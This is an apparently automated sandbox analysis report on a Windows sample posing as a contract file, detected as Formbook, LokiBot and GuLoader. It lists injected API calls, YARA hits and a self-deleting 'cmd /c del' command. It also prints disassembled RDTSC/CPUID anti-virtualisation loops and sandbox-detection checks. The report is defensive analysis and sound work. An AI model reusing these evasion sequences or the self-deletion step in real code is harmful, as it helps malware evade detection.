      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F96D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9560 NtWriteFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FAD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F95F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FA770 NtOpenThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FA710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F97A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FB040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F98F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F98A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FA3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF81B0 NtCreateFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF82E0 NtClose,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF8260 NtReadFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF8390 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF82DA NtClose,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF825A NtReadFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF838A NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 056BB150 appears 54 times
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: String function: 1E4CB150 appears 35 times
      Source: UAE CONTRACT SUPPLY.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.390017315.0000000002C30000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameVrdihftetgo6.exeFE2XTred6 vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389503842.0000000002230000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514676013.00000000000B6000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000000.388321692.0000000000416000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519498317.000000001DED0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.515245595.0000000002460000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe Binary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.631687849.0000000000FD4000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/0@10/4
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1068:120:WilError_01
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe File created: C:\Users\user\AppData\Local\Temp\~DF36513EDB16C1AC61.TMP
      Source: UAE CONTRACT SUPPLY.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: UAE CONTRACT SUPPLY.exe Virustotal: Detection: 33%
      Source: UAE CONTRACT SUPPLY.exe ReversingLabs: Detection: 36%
      Source: unknown Process created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: unknown Process created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: unknown Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: unknown Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
      Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Process created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
      Source: Binary string: chkdsk.pdbGCTL source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp
      Source: Binary string: chkdsk.pdb source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: UAE CONTRACT SUPPLY.exe, chkdsk.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match File source: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6848, type: MEMORY
      Source: Yara match File source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match File source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6848, type: MEMORY
      Source: Yara match File source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_00409C7D push ss; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_0040B823 pushfd ; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_00409D6C push ebx; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_00409D7E push ss; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_00409E5B push ss; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_00407341 push ebx; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_00409F49 push ss; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_0040A765 push 00000062h; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_0040B370 push eax; ret
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_0226005D push FFFFFFB9h; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_02260130 push FFFFFFB9h; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 3_2_1E51D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0570D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CF519C push esi; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CE6108 push cs; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CFCA50 push 0000005Ah; ret
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CFB3FB push eax; ret
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CFB3F2 push eax; ret
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CFB3A5 push eax; ret
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CFBB58 push ebp; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CEC308 push ds; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CFBCB2 push cs; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CFB45C push eax; ret
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CFB5BB push ebp; ret
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CF4EAE push eax; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_00CFBEAB push ecx; iretd
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_0226054E EnumWindows,NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 1_2_022652C8 NtSetInformationThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe Code function: 3_2_005652C8
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 0000000002260457 second address: 0000000002260457 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 00000000022652A9 second address: 00000000022652A9 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F29049E4728h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, dx 0x00000020 test ah, ah 0x00000022 add edi, edx 0x00000024 cmp dl, bl 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007F29049E46FEh 0x00000035 cmp dx, 3BF6h 0x0000003a cmp dl, dl 0x0000003c call 00007F29049E477Ah 0x00000041 call 00007F29049E4738h 0x00000046 lfence 0x00000049 mov edx, dword ptr [7FFE0014h] 0x0000004f lfence 0x00000052 ret 0x00000053 mov esi, edx 0x00000055 pushad 0x00000056 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 0000000002265176 second address: 0000000002265176 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 0000000002265B0F second address: 0000000002265B0F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], FFFFFFE8h 0x0000000d jne 00007F29049E3212h 0x0000000f test bh, FFFFFFD2h 0x00000012 cmp bl, bl 0x00000014 cmp byte ptr [ebx], FFFFFFB8h 0x00000017 jne 00007F29049E31E8h 0x00000019 cmp ecx, 00002000h 0x0000001f jne 00007F29049E30D5h 0x00000025 inc ecx 0x00000026 inc ebx 0x00000027 test ch, ch 0x00000029 cmp dword ptr [ebx], 9090C350h 0x0000002f jne 00007F29049E31D6h 0x00000031 jmp 00007F29049E31E2h 0x00000033 test cx, dx 0x00000036 cmp edx, dword ptr [ebx] 0x00000038 jne 00007F29049E31CEh 0x0000003a pushad 0x0000003b rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 0000000000564E71 second address: 0000000000564E71 instructions:
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe File opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, UAE CONTRACT SUPPLY.exe, 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE9
      Source: UAE CONTRACT SUPPLY.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 0000000002262D1F second address: 0000000002262D1F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, ebx 0x0000000d mov ecx, 00001000h 0x00000012 cmp ebx, eax 0x00000014 div ecx 0x00000016 cmp edx, 00000000h 0x00000019 jne 00007F29049E46E2h 0x0000001b dec ebx 0x0000001c xor edx, edx 0x0000001e jmp 00007F29049E473Eh 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 0000000002260457 second address: 0000000002260457 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 00000000022652A9 second address: 00000000022652A9 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F29049E4728h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, dx 0x00000020 test ah, ah 0x00000022 add edi, edx 0x00000024 cmp dl, bl 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007F29049E46FEh 0x00000035 cmp dx, 3BF6h 0x0000003a cmp dl, dl 0x0000003c call 00007F29049E477Ah 0x00000041 call 00007F29049E4738h 0x00000046 lfence 0x00000049 mov edx, dword ptr [7FFE0014h] 0x0000004f lfence 0x00000052 ret 0x00000053 mov esi, edx 0x00000055 pushad 0x00000056 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 00000000022652F2 second address: 00000000022652F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F29049E3695h 0x0000001d popad 0x0000001e call 00007F29049E32E0h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 0000000002265176 second address: 0000000002265176 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 0000000002265B0F second address: 0000000002265B0F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], FFFFFFE8h 0x0000000d jne 00007F29049E3212h 0x0000000f test bh, FFFFFFD2h 0x00000012 cmp bl, bl 0x00000014 cmp byte ptr [ebx], FFFFFFB8h 0x00000017 jne 00007F29049E31E8h 0x00000019 cmp ecx, 00002000h 0x0000001f jne 00007F29049E30D5h 0x00000025 inc ecx 0x00000026 inc ebx 0x00000027 test ch, ch 0x00000029 cmp dword ptr [ebx], 9090C350h 0x0000002f jne 00007F29049E31D6h 0x00000031 jmp 00007F29049E31E2h 0x00000033 test cx, dx 0x00000036 cmp edx, dword ptr [ebx] 0x00000038 jne 00007F29049E31CEh 0x0000003a pushad 0x0000003b rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 0000000000562D1F second address: 0000000000562D1F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, ebx 0x0000000d mov ecx, 00001000h 0x00000012 cmp ebx, eax 0x00000014 div ecx 0x00000016 cmp edx, 00000000h 0x00000019 jne 00007F29049E46E2h 0x0000001b dec ebx 0x0000001c xor edx, edx 0x0000001e jmp 00007F29049E473Eh 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 00000000005652F2 second address: 00000000005652F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F29049E3695h 0x0000001d popad 0x0000001e call 00007F29049E32E0h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 0000000000564E71 second address: 0000000000564E71 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000000CE85E4 second address: 0000000000CE85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000000CE896E second address: 0000000000CE8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022608D0 rdtsc
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 0000000D.00000000.499784826.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 0000000D.00000000.499829502.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
